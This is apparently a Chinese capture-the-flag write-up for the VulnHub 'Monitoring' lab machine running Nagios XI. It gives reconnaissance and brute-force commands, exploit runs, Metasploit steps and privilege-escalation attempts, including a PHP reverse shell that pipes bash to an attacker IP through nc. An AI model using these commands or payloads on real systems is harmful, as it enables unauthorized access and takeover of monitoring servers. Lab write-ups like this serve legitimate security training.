靶機(jī)地址：https://download.vulnhub.com/monitoring/Monitoring.ova

---

1. 主機(jī)發(fā)現(xiàn)

目前只知道目標(biāo)靶機(jī)在192.xx網(wǎng)段，通過(guò)如下的命令，看看這個(gè)網(wǎng)段上在線的主機(jī)。

$ nmap -sP 192.168.192.0/24

鎖定靶機(jī)IP地址為192.168.192.132.

2. 端口掃描

針對(duì)目標(biāo)靶機(jī)進(jìn)行端口掃描。

$ sudo nmap -p- 192.168.192.132

3. 服務(wù)枚舉

通過(guò)下面的命令掃描一下目標(biāo)靶機(jī)開(kāi)放端口上運(yùn)行的服務(wù)。

$ sudo nmap -A -p22,25,80,389,443,5667 -sV -sT 192.168.192.132

4. 服務(wù)探查

服務(wù)不多，逐個(gè)試試看。

4.1 ssh服務(wù)

先試試22端口上的ssh服務(wù)。

$ ssh root@192.168.192.132

試了一下，可以訪問(wèn)，這為后面的爆破提供了可能。

4.2 smtp服務(wù)

試試25端口上的smtp服務(wù)。

$ telnet 192.168.192.132 25

這個(gè)端口可以用，不過(guò)還不太會(huì)，上網(wǎng)搜索一番。

$ nc 192.168.192.132 25

返回250說(shuō)明響應(yīng)成功，使用EHLO可以查看支持的各種擴(kuò)展列表。

EHLO 192.168.192.132

再進(jìn)一步試一下。

嗯，看來(lái)是可以用的，并且存在一個(gè)root@localhost的郵箱，根據(jù)后面探查的結(jié)果再回來(lái)看。

4.3 http/https服務(wù)

直接用瀏覽器訪問(wèn)一下。

可以訪問(wèn)，不過(guò)不知道Nagios是個(gè)啥玩意兒，搜索了一下，貌似是一個(gè)在線監(jiān)控的工具。仔細(xì)瀏覽一下看看，發(fā)現(xiàn)有登錄頁(yè)面，如下圖。

隨便輸入登錄一下試試。

貌似沒(méi)法枚舉賬號(hào)，嘗試忘記密碼試試看。

額，貌似跟郵件系統(tǒng)有了關(guān)聯(lián)。可惜一頓折騰也沒(méi)有搞定郵件系統(tǒng)。還是返回來(lái)進(jìn)行目錄枚舉一下。

$ dirsearch -u http://192.168.192.132:80/

沒(méi)發(fā)現(xiàn)有用的內(nèi)容，還是嘗試爆破一下root賬號(hào)試試看，結(jié)果也失敗了。還是上網(wǎng)看看有什么有用的信息吧。再官網(wǎng)上找到了一個(gè)安裝指南（https://assets.nagios.com/downloads/nagiosxi/docs/installation-manual-of-Nagios-XI-2024.pdf），這里面默認(rèn)用了一個(gè)nagiosadmin的管理員賬號(hào)，如下圖。

嘗試用rockyou爆破一下這個(gè)賬號(hào)試試。

最后爆破出來(lái)的nagiosadmin用戶的密碼是admin，手工登錄看看。

登錄成功，版本為Nagios XI 5.6.0。直接searchsploit搜索一下這個(gè)版本上有啥可以利用的漏洞。

$ searchsploit “Nagios XI”

貌似可以利用的EXP還不少，我們倒著看編號(hào)為49422的RCE漏洞。
首先再kali上4444端口建立監(jiān)聽(tīng)。

$ nc -lvnp 4444

然后按照腳本提示，直接執(zhí)行EXP。

$ python3 49422.py http://192.168.192.132 nagiosadmin admin 192.168.192.129 4444

順利突破了邊界，獲得了反彈shell，如下圖所示。

5. 系統(tǒng)提權(quán)

先優(yōu)化一下shell。

www-data@ubuntu:/usr/local/nagiosxi/html/admin$ whereis python
www-data@ubuntu:/usr/local/nagiosxi/html/admin$ /usr/bin/python3.5 -c "import  pty; pty.spawn('/bin/bash')"

5.1 枚舉系統(tǒng)信息

$ uname -a
$ cat /etc/*-release

是64位的ubuntu 16.04。

5.2 枚舉passwd文件

$ cat /etc/passwd | grep -v nologin

正常的shell用戶也不多。

5.3 枚舉定時(shí)任務(wù)

枚舉一下定時(shí)任務(wù)試試看。

沒(méi)有合適的。

5.4 linpeas提權(quán)

直接使用linpeas提取。

$ chmod u+x linpeas.sh
$ sh linpeas.sh

下圖所示的三個(gè)EXP是非常有可能的。

我們逐個(gè)試一下。

$ searchsploit -m 45010

然后在ubuntu 16.04上面編譯一下。

$ gcc 45010.c -o 45010

然后上傳到靶機(jī)的/tmp目錄下執(zhí)行一下試試看。

$ chmod u+x 45010
$ ./45010

提權(quán)失敗，再試試第二個(gè)。

第二個(gè)直接卡住了，再試試第三個(gè)。

第三個(gè)也是沒(méi)啥動(dòng)靜，宣告失敗。
接著往下看，在sudo -l下面，有比較多有意思的內(nèi)容，如下圖所示。

看不太懂，不太會(huì)用，上網(wǎng)搜索下，發(fā)現(xiàn)有篇文章對(duì)（https://www.tenable.com/security/research/tra-2020-61）這個(gè)有一些總結(jié)性說(shuō)明?，F(xiàn)在嘗試一下。

$ sudo /usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses=127.0.0.1/1 --output=/usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php
$ sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
$ echo -e "user = nagios\ngroup = nagios\nlog_type = file\nlog_file = /usr/local/nagios/var/npcd.log\nmax_logfile_size = 10485760\nlog_level = 0\nperfdata_spool_dir = /usr/local/nagiosxi/scripts/components/\nperfdata_file_run_cmd = /usr/bin/curl\nperfdata_file_run_cmd_args = file:///usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php -o /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php\nnpcd_max_threads = 5\nsleep_time = 15\nload_threshold = 10.0\npid_file=/usr/local/nagiosxi/var/subsys/npcd.pid\n\n# scrappy" > /usr/local/nagios/etc/pnp/npcd.cfg
$ echo -e "\x3c\x3fphp system('/bin/bash -i 2>&1 | nc 192.168.192.129 5555'); \x3f\x3e" > /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php
$ sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
$ sudo /usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php test

可惜的是，監(jiān)聽(tīng)一直反彈成功。從好多的現(xiàn)象來(lái)看，nagios用戶的權(quán)限貌似比www-data要高，想辦法切換到nagios用戶試試看，直接用hydra爆破一下。

$ hydra -l nagios -P ../../rockyou.txt -vV -e ns 192.168.192.132 ssh

半天也沒(méi)有結(jié)果，看來(lái)得想其它辦法了。利用神器metasploit試試看。

$ msfconsole
msf6 > search nagios

看不太懂，不管了把Rank為Excellent并且Check為Yes的都試一下。
最后發(fā)現(xiàn)行號(hào)為19的EXP可以成功，如下所示。

msf6 > use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set PASSWORD admin
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set RHOSTS 192.168.192.132
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST 192.168.192.129
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run

直接進(jìn)來(lái)就是root權(quán)限，這個(gè)EXP比較牛逼。

6. 獲取flag

成功獲得flag，本次打靶到此結(jié)束。